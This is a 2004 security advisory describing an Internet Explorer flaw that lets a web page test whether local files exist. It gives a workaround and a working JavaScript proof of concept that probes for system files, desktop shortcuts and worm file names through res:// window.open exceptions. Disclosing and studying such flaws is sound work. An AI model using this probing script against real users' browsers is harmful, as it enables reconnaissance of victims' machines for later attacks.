msieLocalFile.txt

`Microsoft Internet Explorer permits to examine the existence of local files  
  
  
Description:  
There is a security bug in Microsoft Internet Explorer, which allows to  
check up existence of local files in system directories (Root (C:/),  
WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).  
Successful exploitation allows the author of a malicious web site to plan  
attacks against the target computer.  
The bug occurs, because Microsoft Internet Explorer does not open a window,  
if the target file exists; but it will open a window, if the file does not  
exist.  
Also an attacker can use this "feature" to verify existence of local files  
(e.g. system files, malware files, shortcuts on Desktop, ...).  
  
Affected software:  
Microsoft Internet Explorer  
  
Workaround:  
Deactivate "Active Scripting" in the IE options menu.  
  
Proof-of-Concept exploit:  
  
<textarea id="btft" rows="10" cols="75"></textarea><br>  
<input type="text" id="btfn" value="iexplore.exe">  
<input type="button" value="> Search >"  
onClick="alert('File '+btfc(document.all.btfn.value));">  
  
<script>  
  
// Copyright (C) 2004 by Benjamin Tobias Franz ([email protected])  
//  
// Search for files with known names in following directories:  
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,  
// Internet Explorer  
  
function btfc(btfp){  
var btfe=0,btfp;  
try{window.open("res://"+btfp,"_search");}  
catch(e){btfe=1;}  
if(btfe==1)return "'"+btfp+"' exists!\n";  
else return "'"+btfp+"' does NOT exist!\n";}  
  
var btfd="",btfv="BTF-AntiVirus: Search for '";  
btfd+="Search for system files ...\n";  
btfd+=btfc("autoexec.bat");  
btfd+=btfc("msdos.sys");  
btfd+=btfc("twain.dll");  
btfd+=btfc("swflash.ocx");  
btfd+=btfc("shell32.dll");  
btfd+=btfc("test.txt");  
btfd+=btfc("test.btf");  
btfd+="\nSearch for shortcut files (on desktop) ...\n";  
btfd+=btfc("Microsoft Word.lnk");  
btfd+=btfc("IrfanView.lnk");  
btfd+=btfc("Opera.lnk");  
btfd+=btfc("Mozilla.lnk");  
btfd+=btfc("Netscape 6.lnk");  
btfd+=btfc("Netscape 7.lnk");  
btfd+=btfc("btf.lnk");  
btfd+="\nSearch for virus/worm files ...\n";  
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");  
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");  
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");  
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");  
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");  
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");  
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");  
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");  
btfd+=btfv+"Klez' : "+btfc("wqk.exe");  
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");  
btfd+=btfv+"Maldal' : "+btfc("win.exe");  
btfd+=btfv+"Gokar' : "+btfc("karen.exe");  
  
// ...  
  
document.all.btft.value=  
"Copyright (C) 2004 by Benjamin Tobias Franz ([email protected])\n\n"+  
btfd;  
</script>  
  
  
Date of discovery:  
06. November 2004  
  
  
Tested in Microsoft Internet Explorer 6 SP1 (6.0.2800.1106) with all  
patches installed on Windows 98.  
  
  
My DLL versions:  
  
MSHTML.DLL: 6.00.2800.1477  
BROWSEUI.DLL: 6.00.2800.1596 (xpsp2.040919-1003)  
SHDOCVW.DLL: 6.00.2800.1596 (xpsp2.040919-1003)  
SHLWAPI.DLL: 6.00.2800.1584 (xpsp2.040720-1705)  
URLMON.DLL: 6.00.2800.1475  
WININET.DLL: 6.00.2800.1475  
  
  
Regards,  
Benjamin Tobias Franz  
Germany  
  
`